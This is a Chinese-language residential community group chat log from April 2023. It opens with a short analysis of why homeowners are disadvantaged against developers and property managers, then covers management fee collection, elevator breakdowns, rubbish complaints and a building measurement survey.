之所以处于劣势地位,总结归纳如下原因: 第一,维权意识的薄弱。很多业主在利益受到侵害时,由于怕麻烦、不当“出头鸟”等原因,多数选择忍气吞声,不懂得运用现有的法律手段为自己争取正当的利益。 第二,维权成本过大。在采取一定的行动之前,业主们也会有成本的考虑。一方面,业主们自己有正常的工作和家庭,没有那么多的精力和时间从事维权。另一方面,自己损失的,单个来说可能是几千、几万,但是如果一旦坚定的选择维权,耗费的时间和精力还有资金,很可能要大于原本的损失,而且这种损失不见得就一定会有挽回的余地。 第三,缺乏有效的组织。“集体行动的困境”,这是美国著名教授奥尔森做出的解释。简单来说,社区中肯定有一些是关系到公共利益的问题,如果问题得到解决,这种收益是公共性的,也就是说整个社区中的成员都会共同而且均等地分享到这种利益。 但基于时间、家庭等各种原因,大家都不愿意当那个带头行动的人,多数人愿意充当单纯的受益者。这种“搭便车”的人越多,业主组织起来也就越难。 第四,资源的悬殊差距。开发商在财力上的优势是业主无可比拟的,很多情况下,单纯的财力又会与其他资源进行交换,简单一点说,开发商和物业在明面暗面,都要比业主们“吃得开”的多。

江南17:53

@所有人 我们平时不准备,问题大的时候,更没有人出来当枪口下的出头鸟。

江南17:58

怎么体现我们的团结? 1、我们自行管理的当下,100%的业主交管理费就是我们团结一致体现。

江南17:59

2、积极参加讨论。

江南18:02

3、按法律法规集体组织。

江南18:09

现在新注册的物业公司只能叫“物业服务有限公司”而不能像以前那样叫“物业管理有限公司”,国家这样的规定,大家要理解里面的深层意义。大家看看我们现在的物业公司,表现出来的是管理而不是服务就可以知道了。这在全国是普遍现象。

江南18:13

像2019年注册的广州市大纲领物业服务有限公司,就只能叫物业服务有限公司,而不能叫物业管理有限公司了

江南19:09

@所有人 争取这次100%业主交管理费

江南19:14

我们共同来探讨小区管理的方法,我们做得好,这对自己,对子女,对小区集体,对社会都很有益处。

江南19:15

@D栋A303 [强]

江南19:41

@陈天琴B201 是的,3-4月的管理费

江南22:15

@D栋B梯502 是的,3-4月,在4月交,下次是5-6月的,在6月交。


— 2023-04-03 —

卓勇超18:47

@B梯705 水1102

杰佬1335287001018:59

[抱拳][抱拳]


— 2023-04-04 —

07:59

B梯电梯在6楼又不动了,刚刚碰到扫地阿姨,她叫我问一下@B-808

江南08:01

我通知维保公司

陈雪芳(惠华)1371025268308:11

@B-808 A梯6楼电梯窗口全是垃圾

江南08:42

应该是租客丢的,我说说他们。

大小姐^*^08:44

7楼电梯窗口也是,塞满烟头纸巾

大小姐^*^08:45

在等电梯看到脏又恶心


— 2023-04-06 —

紫惠10:29

@B-808 早晨江老师,请问明天早上是不是真的?是否一定要留人开门测量[玫瑰][微笑]

江南10:59

@B梯802 有人在家就等他们来测量吧。

紫惠11:01

没人在呀[撇嘴]

江南14:13

尽量配合吧,我觉得同个号码不同楼层的,只要有房子测过其它的就一样了。再怎么说也是摸一下底,日后要是真的拆迁补偿不会这么简单的。


— 2023-04-07 —

田利坤08:59

江老师测量的有来吗

杰佬1335287001010:38

有人在测量了吗?江老师

卓勇超10:42

听说一楼档口测量了

妮达毛织10:55

@602,有空过来弄下垃圾门,不好开[调皮]

卓勇超11:00

卓勇超11:00

每次收垃圾桶就会这样

卓勇超11:41

等一下工测量工作人员去A梯了

卓勇超11:49

@A业主老板所有人

11:49

量到哪里了

 毛毛11:50

206